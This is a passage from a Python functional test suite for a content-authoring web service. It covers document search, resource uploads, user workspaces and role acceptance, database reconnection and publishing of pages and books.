response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
new_doc_id = result['id']
self.assert_cors_headers(response)
# should not be able to get other user's documents
response = self.testapp.get('/users/contents/search?q=document', status=200)
result = response.json
self.assertDictEqual(result, {
'query': {
'limits': [{'tag': 'text', 'value': 'document'}]},
'results': {
'items': [],
'total': 0,
'limits': []}})
self.assert_cors_headers(response)
# should be able to search user's own documents
response = self.testapp.get('/users/contents/search?q=DNA', status=200)
result = response.json
self.assertEqual(result['results']['total'], 1)
self.assertEqual(result['results']['items'][0]['id'],
'{}@draft'.format(doc_id))
self.assert_cors_headers(response)
# should be able to search multiple terms
response = self.testapp.get('/users/contents/search?q=new+resonance', status=200)
result = response.json
self.assertEqual(result['query']['limits'], [
{'tag': 'text', 'value': 'new'},
{'tag': 'text', 'value': 'resonance'}])
self.assertEqual(result['results']['total'], 2)
self.assertEqual(sorted([i['id'] for i in result['results']['items']]),
sorted(['{}@draft'.format(doc_id),
'{}@draft'.format(new_doc_id)]))
self.assert_cors_headers(response)
# should be able to search with double quotes
response = self.testapp.get('/users/contents/search?q="through resonance"',
status=200)
result = response.json
self.assertEqual(result['query']['limits'], [
{'tag': 'text', 'value': 'through resonance'}])
self.assertEqual(result['results']['total'], 1)
self.assertEqual(result['results']['items'][0]['id'],
'{}@draft'.format(doc_id))
self.assert_cors_headers(response)
def test_get_resource_401(self):
self.logout()
response = self.testapp.get('/resources/1234abcde', status=401)
self.assert_cors_headers(response)
def test_get_resource_403(self):
with open(get_data('1x1.png'), 'rb') as data:
upload_data = data.read()
response = self.testapp.post(
'/resources',
{'file': Upload('1x1.png', upload_data, 'image/png')},
status=201)
self.assert_cors_headers(response)
redirect_url = response.headers['Location']
with mock.patch('cnxauthoring.models.Resource.__acl__') as acl:
acl.return_value = ()
response = self.testapp.get(redirect_url, status=403)
self.assert_cors_headers(response)
def test_get_resource_404(self):
response = self.testapp.get('/resources/1234abcde', status=404)
self.assert_cors_headers(response)
def test_get_resource_html(self):
"""Test that a html resource file will get downloaded as a binary file
to avoid people using it to steal cookies etc
See https://github.com/Connexions/cnx-authoring/issues/64
"""
upload_data = b'<html><body><h1>title</h1></body></html>'
response = self.testapp.post('/resources', {
'file': Upload('a.html', upload_data,
'text/html')}, status=201)
redirect_url = response.headers['Location']
self.assert_cors_headers(response)
response = self.testapp.get(redirect_url, status=200)
self.assertEqual(response.body, upload_data)
self.assertEqual(response.content_type, 'application/octet-stream')
self.assert_cors_headers(response)
def test_get_resource(self):
with open(get_data('1x1.png'), 'rb') as data:
upload_data = data.read()
response = self.testapp.post(
'/resources',
{'file': Upload('1x1.png', upload_data, 'image/png')},
status=201)
redirect_url = response.headers['Location']
response = self.testapp.get(redirect_url, status=200)
self.assertEqual(response.body, upload_data)
self.assertEqual(response.content_type, 'image/png')
self.assert_cors_headers(response)
# any logged in user can retrieve any resource files
self.logout()
self.login('user3')
response = self.testapp.get(redirect_url, status=200)
self.assertEqual(response.body, upload_data)
self.assertEqual(response.content_type, 'image/png')
self.assert_cors_headers(response)
def test_post_resource_401(self):
self.logout()
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=401)
self.assert_cors_headers(response)
def test_post_resource_403(self):
with mock.patch('cnxauthoring.models.Resource.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=403)
self.assert_cors_headers(response)
def test_post_resource(self):
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=201)
self.assertEqual(response.content_type, 'text/plain')
self.assertEqual(response.headers['Location'],
'http://localhost/resources/'
'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assertEqual(response.body,
b'/resources/'
b'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assert_cors_headers(response)
def test_post_duplicate_resource(self):
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=201)
self.assertEqual(response.content_type, 'text/plain')
self.assertEqual(response.headers['Location'],
'http://localhost/resources/'
'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assertEqual(response.body,
b'/resources/'
b'f572d396fae9206628714fb2ce00f72e94f2258f')
response = self.testapp.post(
'/resources',
{'file': Upload('a.txt', b'hello\n', 'text/plain')},
status=201)
self.assertEqual(response.content_type, 'text/plain')
self.assertEqual(response.headers['Location'],
'http://localhost/resources/'
'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assertEqual(response.body,
b'/resources/'
b'f572d396fae9206628714fb2ce00f72e94f2258f')
self.assert_cors_headers(response)
def test_post_resource_exceed_size_limit(self):
two_mb = b'x' * 2 * 1024 * 1024
response = self.testapp.post(
'/resources',
# a 2MB file, size limit for tests is 1MB
{'file': Upload('a.txt', two_mb, 'text/plain')},
status=400)
self.assertIn(b'File uploaded has exceeded limit 1MB', response.body)
def test_user_search_no_q(self):
response = self.testapp.get('/users/search')
result = response.json
self.assertEqual(result, {
u'total_count': 0,
u'users': [],
})
self.assert_cors_headers(response)
def test_user_search_q_empty(self):
response = self.testapp.get('/users/search?q=')
result = response.json
self.assertEqual(result, {
u'total_count': 0,
u'users': [],
})
self.assert_cors_headers(response)
def test_user_search(self):
mock_accounts_search_results = {
u'items': [
{u'username': u'admin', u'id': 1},
{u'username': u'karenc', u'id': 6},
{u'username': u'karenchan', u'id': 4},
{u'username': u'karenchan2014',
u'first_name': u'Karen',
u'last_name': u'Chan',
u'id': 10,
u'full_name': u'Karen Chan'},
{u'username': u'user_30187', u'id': 9}
],
u'total_count': 5}
with mock.patch('openstax_accounts.stub.OpenstaxAccounts.search'
) as accounts_search:
accounts_search.return_value = mock_accounts_search_results
response = self.testapp.get('/users/search?q=admin')
args, kwargs = accounts_search.call_args
self.assertEqual(args, ('admin',))
self.assertEqual(kwargs, {
'per_page': 10, 'order_by': 'last_name,first_name'})
result = response.json
self.assertEqual(result, {
u'users': [
{
u'id': u'admin',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
{
u'id': u'karenc',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
{
u'id': u'karenchan',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
{
u'id': u'karenchan2014',
u'firstname': u'Karen',
u'surname': u'Chan',
u'fullname': u'Karen Chan',
u'suffix': None,
u'title': None,
},
{
u'id': u'user_30187',
u'firstname': None,
u'surname': None,
u'fullname': None,
u'suffix': None,
u'title': None,
},
],
u'total_count': 5,
})
self.assert_cors_headers(response)
def test_profile_401(self):
self.logout()
response = self.testapp.get('/users/profile', status=401)
self.assert_cors_headers(response)
def test_profile(self):
response = self.testapp.get('/users/profile', status=200)
result = response.json
self.assertEqual(result, SUBMITTER)
self.assert_cors_headers(response)
def test_user_contents_401(self):
self.logout()
response = self.testapp.get('/users/contents', status=401)
self.assert_cors_headers(response)
def test_user_contents(self):
# user1 adds a document
response = self.testapp.post_json(
'/users/contents',
{'title': 'document by default user',
'editors': [{"id": "user2"}],
}, status=201)
page = response.json
# user1 adds user3 as an author, editor, licensor and publisher
# and adds user4 as a translator
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'authors': page['authors'] + [{'id': 'user3'}],
'editors': page['editors'] + [{'id': 'user3'}],
'translators': [{'id': 'user4'}],
'licensors': page['licensors'] + [{'id': 'user3'}],
'publishers': page['publishers'] + [{'id': 'user3'}]},
status=200)
page = response.json
# user1 removes user4 as a translator
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'translators': []}, status=200)
page = json.loads(response.body.decode('utf-8'))
# the document should show up in user1's workspace
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'])
for i in result['results']['items']]
self.assertIn(('{}@draft'.format(page['id']), []), content_ids)
# user2 should be able to see the document user1 added
self.logout()
self.login('user2')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'], i['state'])
for i in result['results']['items']]
self.assertIn(
('{}@draft'.format(page['id']), ['editors'], 'Awaiting acceptance'
), content_ids)
self.assert_cors_headers(response)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# user2 rejects the role request
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': False}]},
status=200)
# user2 should see the document with state "Rejecting roles" on their
# workspace
response = self.testapp.get('/users/contents', status=200)
result = json.loads(response.body.decode('utf-8'))
content_ids = [(i['id'], i['rolesToAccept'], i['state'])
for i in result['results']['items']]
self.assertIn(
('{}@draft'.format(page['id']), [], 'Rejected roles'), content_ids)
self.assert_cors_headers(response)
# after user2 deletes the document from the workspace, they won't see
# it anymore
self.testapp.delete('/contents/{}@draft/users/me'.format(page['id']))
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [i['id'] for i in result['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), content_ids)
self.assert_cors_headers(response)
# user3 should be able to see the document user1 added
self.logout()
self.login('user3')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'])
for i in result['results']['items']]
self.assertIn(('{}@draft'.format(page['id']),
['authors', 'copyright_holders', 'editors',
'publishers']), content_ids)
self.assert_cors_headers(response)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# user3 should not be able to edit the document before accepting their
# role
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {}, status=403)
# user3 rejects the editor role
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': False}]},
status=200)
# user3 should still be able to view the content
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'])
for i in result['results']['items']]
self.assertIn(('{}@draft'.format(page['id']),
['authors', 'copyright_holders', 'publishers']),
content_ids)
self.assert_cors_headers(response)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# user3 accepts their other roles
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'authors', 'hasAccepted': True},
{'role': 'publishers', 'hasAccepted': True},
{'role': 'licensors', 'hasAccepted': True}]},
status=200)
# user3 should be able to edit the document after accepting their
# role
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {}, status=200)
# user4 should not be able to see the document user1 added
self.logout()
self.login('user4')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [i['id'] for i in result['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), content_ids)
self.assert_cors_headers(response)
# user1 adds user2 as an illustrator
self.logout()
self.login('user1')
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'illustrators': [{'id': 'user2'}]}, status=200)
page = response.json
# user2 should see the document in their workspace again
self.logout()
self.login('user2')
response = self.testapp.get('/users/contents', status=200)
result = response.json
content_ids = [(i['id'], i['rolesToAccept'], i['state'])
for i in result['results']['items']]
self.assertIn(
('{}@draft'.format(page['id']), ['illustrators'],
'Awaiting acceptance'), content_ids)
# user1 removes self from all roles
self.logout()
self.login('user1')
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'authors': [i for i in page['authors'] if i['id'] != 'user1'],
'publishers': [i for i in page['publishers']
if i['id'] != 'user1'],
'licensors': [i for i in page['licensors']
if i['id'] != 'user1']},
status=200)
# user1 should not see the document in their workspace
response = self.testapp.get('/users/contents')
result = response.json
content_ids = [i['id'] for i in result['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), content_ids)
def test_user_contents_ordering(self):
# user4 adds a document
self.logout()
self.login('user4')
date = datetime.datetime(2014, 3, 13, 15, 21, 15, 677617)
date = pytz.timezone(os.environ['TZ']).localize(date)
posting_tzinfo = pytz.timezone('America/Whitehorse')
posting_date = date.astimezone(posting_tzinfo)
from ..utils import utf8
response = self.testapp.post_json('/users/contents', {
'title': 'document by user4',
'created': utf8(posting_date.isoformat()),
'revised': utf8(posting_date.isoformat()),
}, status=201)
page = response.json
# user4 should get back the contents just posted - full content test
response = self.testapp.get('/users/contents', status=200)
result = response.json
from ..models import TZINFO
# Localize the resulting datetime info.
from ..utils import utf8
expected_result_revised_date = date.astimezone(TZINFO)
self.assertEqual(result, {
u'query': {
u'limits': [],
},
u'results': {u'items': [
{u'derivedFrom': None,
u'containedIn': [],
u'id': u'{}@draft'.format(page['id']),
u'mediaType': u'application/vnd.org.cnx.module',
u'revised': utf8(expected_result_revised_date.isoformat()),
u'state': u'Draft',
u'title': u'document by user4',
u'version': u'draft',
u'rolesToAccept': [],
}],
u'limits': [],
u'total': 1}
})
self.assert_cors_headers(response)
one_week_ago = datetime.datetime.now(TZINFO) - datetime.timedelta(7)
two_weeks_ago = datetime.datetime.now(TZINFO) - datetime.timedelta(14)
mock_datetime = mock.Mock()
mock_datetime.now = mock.Mock(return_value=one_week_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents',
{'derivedFrom': '91cb5f28-2b8a-4324-9373-dac1d617bc24@1'},
status=201)
self.assert_cors_headers(response)
mock_datetime.now = mock.Mock(return_value=two_weeks_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents',
{'title': 'oldest document by user4'}, status=201)
self.assert_cors_headers(response)
response = self.testapp.post_json(
'/users/contents', {'title': 'new document by user4'}, status=201)
self.assert_cors_headers(response)
response = self.testapp.get('/users/contents', status=200)
result = response.json
self.assertEqual(result['results']['total'], 4)
self.assertTrue(result['results']['items'][0]['id'].endswith('@draft'))
self.assertTrue(result['results']['items'][1]['id'].endswith('@draft'))
self.assertTrue(result['results']['items'][2]['id'].endswith('@draft'))
self.assertTrue(result['results']['items'][3]['id'].endswith('@draft'))
titles = [i['title'] for i in result['results']['items']]
self.assertEqual(titles, [
u'new document by user4',
u'Copy of Indkøb',
u'oldest document by user4',
u'document by user4'])
derived_from = [i['derivedFrom'] for i in result['results']['items']]
self.assertEqual(derived_from, [
None, '91cb5f28-2b8a-4324-9373-dac1d617bc24@1', None, None])
self.assertEqual(response.headers['Access-Control-Allow-Credentials'],
'true')
self.assertEqual(response.headers['Access-Control-Allow-Origin'],
'http://localhost:8000')
self.assert_cors_headers(response)
def test_user_contents_hide_documents_inside_binders(self):
self.logout()
self.login('user5')
one_day_ago = datetime.datetime.now(tz=TZINFO) - datetime.timedelta(1)
one_week_ago = datetime.datetime.now(tz=TZINFO) - datetime.timedelta(7)
mock_datetime = mock.Mock()
mock_datetime.now = mock.Mock(return_value=one_day_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents',
{'title': 'single page document'}, status=201)
single_page = response.json
mock_datetime.now = mock.Mock(return_value=one_week_ago)
with mock.patch('datetime.datetime', mock_datetime):
response = self.testapp.post_json(
'/users/contents', {'title': 'page in a book'}, status=201)
page_in_book = response.json
response = self.testapp.post_json('/users/contents', {
'mediaType': 'application/vnd.org.cnx.collection',
'title': 'book',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page_in_book['id']),
},
],
},
}, status=201)
book = response.json
# since page_in_book is in book, it should not show in the workspace
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [
{
u'containedIn': [],
u'id': u'{}@draft'.format(book['id']),
u'title': book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': book['revised'],
u'mediaType': u'application/vnd.org.cnx.collection',
u'rolesToAccept': [],
},
{
u'containedIn': [],
u'id': u'{}@draft'.format(single_page['id']),
u'title': single_page['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': single_page['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
],
u'total': 2,
u'limits': [],
},
})
# remove page_in_book from book and add single_page to book
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(book['id']), {
'tree': {
'contents': [
{
'id': '{}@draft'.format(single_page['id']),
},
],
},
}, status=200)
book = response.json
# add page_in_book to a book by someone else
self.logout()
self.login('user6')
response = self.testapp.post_json('/users/contents', {
'mediaType': 'application/vnd.org.cnx.collection',
'title': 'some other book',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page_in_book['id']),
},
],
},
}, status=201)
other_book = response.json
self.logout()
self.login('user5')
# workspace should now show page_in_book and book
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [
{
u'containedIn': [],
u'id': u'{}@draft'.format(book['id']),
u'title': book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': book['revised'],
u'mediaType': u'application/vnd.org.cnx.collection',
u'rolesToAccept': [],
},
{
u'containedIn': [other_book['id']],
u'id': u'{}@draft'.format(page_in_book['id']),
u'title': page_in_book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': page_in_book['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
],
u'total': 2,
u'limits': [],
},
})
# retrieve just pages, should now show all pages
response = self.testapp.get(
'/users/contents?mediaType=application/vnd.org.cnx.module',
status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [
{
u'containedIn': [book['id']],
u'id': u'{}@draft'.format(single_page['id']),
u'title': single_page['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': single_page['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
{
u'containedIn': [other_book['id']],
u'id': u'{}@draft'.format(page_in_book['id']),
u'title': page_in_book['title'],
u'derivedFrom': None,
u'state': u'Draft',
u'version': u'draft',
u'revised': page_in_book['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'rolesToAccept': [],
},
],
u'total': 2,
u'limits': [],
},
})
# Now filter for not:Draft - should supress all
response = self.testapp.get('/users/contents?state=not:Draft',
status=200)
workspace = response.json
self.assertEqual(workspace, {
u'query': {
u'limits': [],
},
u'results': {
u'items': [],
u'total': 0,
u'limits': [],
},
})
def test_db_restart(self):
'''
Test to see if the database resets itself after a broken
connection
'''
import psycopg2
from ..storage import storage
self.addCleanup(setattr, storage, 'conn',
psycopg2.connect(storage.conn.dsn))
storage.conn.close()
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'},
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'},
status=201,
expect_errors=True)
self.assertEqual(response.status, '201 Created')
def test_service_unavailable_response(self):
'''
Test service unavailable response when a request is made during a
closed or lost database connection.
'''
import psycopg2
from ..storage import storage
self.addCleanup(setattr, storage, 'conn',
psycopg2.connect(storage.conn.dsn))
storage.conn.close()
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'},
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.get(
'/resources/1234abcde',
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.put_json(
'/contents/1234abcde@draft.json',
{},
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.get(
'/users/contents/search',
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
storage.conn.close()
response = self.testapp.delete(
'/contents/{}@draft'.format(id),
status=503,
expect_errors=True)
self.assertEqual(response.status, '503 Service Unavailable')
@mock.patch('cnxauthoring.views.logger')
def get_database_restart_failed(self, logger):
import psycopg2
from ..storage import storage
self.addCleanup(setattr, storage, 'conn',
psycopg2.connect(storage.conn.dsn))
storage.conn.close()
with mock.patch.object(storage, 'restart') as mock_restart:
mock_restart.side_effect = storage.Error
response = self.testapp.post_json(
'/users/contents',
{'title': 'Test Document'},
status=503)
self.assertEqual(mock_restart.call_count, 1)
self.assertEqual(logger.exception.call_count, 3)
args1, args2, args3 = logger.exception.call_args_list
self.assertEqual(args1[0], ('Storage failure',))
self.assertEqual(args2[0], ('Storage failed to abort',))
self.assertEqual(args3[0], ('Storage failed to restart',))
class PublicationTests(BaseFunctionalTestCase):
def test_publish_401(self):
self.logout()
response = self.testapp.post_json('/publish', {}, status=401)
self.assert_cors_headers(response)
def test_publish_403(self):
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page['id'],
],
}
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json(
'/publish', post_data, status=403)
self.assertTrue('You do not have permission to publish'
in response.body.decode('utf-8'))
post_data = {
'title': 'Binder',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
book = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
book['id'],
],
}
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json(
'/publish', post_data, status=403)
self.assertTrue('You do not have permission to publish'
in response.body.decode('utf-8'))
def test_publish_service_not_available(self):
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
post_data = {
'submitlog': 'Publishing is working!',
'items': [
page['id'],
],
}
with mock.patch('requests.post') as patched_post:
patched_post.return_value = mock.Mock(status_code=404)
response = self.testapp.post_json(
'/publish', post_data, status=400)
self.assertEqual(patched_post.call_count, 1)
self.assertTrue('Unable to publish: response status code: 404'
in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_publish_response_not_json(self):
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
post_data = {
'submitlog': 'Publishing is working!',
'items': [
page['id'],
],
}
with mock.patch('requests.post') as patched_post:
patched_post.return_value = mock.Mock(
status_code=200, content=b'not json')
response = self.testapp.post_json(
'/publish', post_data, status=400)
self.assertEqual(patched_post.call_count, 1)
self.assertTrue('Unable to publish: response body: not json'
in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_publish_single_pages(self):
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'title': u'Página dos',
'content': (u'<html><body><p>Contents of Página dos</p></body>'
u'</html>'),
'abstract': 'Hola!',
'language': 'es',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_two = response.json
# User makes a publication of the two pages...
post_data = {
'submitlog': u'Nueva versión!',
'items': (page_one['id'], page_two['id'],),
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {
page_one['id']: '{}@1'.format(page_one['id']),
page_two['id']: '{}@1'.format(page_two['id']),
}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
for page in (page_one, page_two,):
url = '/contents/{}@draft.json'.format(page['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_derived_from_single_page(self):
# Create the derived page
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
# Publish the derived page
post_data = {
'submitlog': 'Publishing is working!',
'items': [
'{}@draft'.format(page['id']),
],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
self.assert_cors_headers(response)
publication_info = response.json
publication_id = publication_info['publication']
self.assertEqual(publication_info['state'], 'Done/Success')
self.assertEqual(publication_info['mapping'][page['id']],
'{}@1'.format(page['id']))
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
result = response.json
self.assertEqual(result['state'], 'Done/Success')
self.assertEqual(result['publication'], unicode(publication_id))
def test_publish_binder(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
response = self.testapp.post_json('/users/contents', {
'title': 'Page two',
'content': '<html><body><p>Content of page two</p></body></html>',
'abstract': 'gotta have one'
}, status=201)
page2 = response.json
self.assert_cors_headers(response)
response = self.testapp.post_json('/users/contents', {
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page1['id']),
'title': 'Page one',
},
{
'id': 'subcol',
'title': 'New section',
'contents': [
{
'id': '{}@draft'.format(page2['id']),
'title': 'Page two',
},
],
},
],
},
}, status=201)
self.assert_cors_headers(response)
binder = response.json
post_data = {
'submitlog': 'Publishing a book is working?',
'items': (binder['id'], page1['id'], page2['id'],),
}
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {
binder['id']: '{}@1.1'.format(binder['id']),
page1['id']: '{}@1'.format(page1['id']),
page2['id']: '{}@1'.format(page2['id']),
}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
for page in (binder, page1, page2,):
url = '/contents/{}@draft.json'.format(page['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_as_author(self):
author_id = 'cnxcap'
# Post a page.
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
# Put an author on.
page1['authors'].append({'id': author_id, 'type': 'cnx-id'})
response = self.testapp.put_json('/contents/{}@draft.json'
.format(page1['id']), page1)
page1 = response.json
self.logout()
# Login as the author to accept the role and publish.
self.login(author_id)
self.testapp.post_json('/contents/{}@draft/acceptance'
.format(page1['id']),
{'license': True,
'roles': [{'role': 'authors',
'hasAccepted': True}]})
post_data = {
'submitlog': 'Publishing a page as an author is working?',
'items': (page1['id'],),
}
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {page1['id']: '{}@1'.format(page1['id'])}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
url = '/contents/{}@draft.json'.format(page1['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_binder_w_printStyle(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
'printStyle': '*PDF Print Style*',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
response = self.testapp.post_json('/users/contents', {
'title': 'Page two',
'content': '<html><body><p>Content of page two</p></body></html>',
'printStyle': '[PDF Print Style]',
'abstract': 'need one'
}, status=201)
page2 = response.json
self.assert_cors_headers(response)
page1_str = '{}@draft'.format(page1['id'])
page2_str = '{}@draft'.format(page2['id'])
response = self.testapp.post_json(
'/users/contents',
{
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': page1_str,
'title': 'Page one',
},
{
'id': 'subcol',
'title': 'New section',
'contents': [
{
'id': page2_str,
'title': 'Page two',
},
],
},
],
},
}, status=201)
self.assert_cors_headers(response)
binder = response.json
post_data = {
'submitlog': 'Publishing a book is working?',
'items': (binder['id'], page1['id'], page2['id'],),
}
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {
binder['id']: '{}@1.1'.format(binder['id']),
page1['id']: '{}@1'.format(page1['id']),
page2['id']: '{}@1'.format(page2['id']),
}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
for page in (binder, page1, page2,):
url = '/contents/{}@draft.json'.format(page['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_derived_from_binder(self):
self.logout()
# Create a derived binder
self.login('e5a07af6-09b9-4b74-aa7a-b7510bee90b8')
post_data = {
'derivedFrom': u'e79ffde3-7fb4-4af3-9ec8-df648b391597@6.1',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
binder = response.json
self.assert_cors_headers(response)
# Publish the derived binder
post_data = {
'submitlog': 'Publishing a derived book',
'items': [
binder['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
self.assert_cors_headers(response)
publication_info = response.json
publication_id = publication_info['publication']
self.assertEqual(publication_info['state'], 'Waiting for moderation')
self.assertEqual(publication_info['mapping'][binder['id']],
'{}@1.1'.format(binder['id']))
response = self.testapp.get(
'/contents/{}@draft.json'.format(binder['id']))
result = response.json
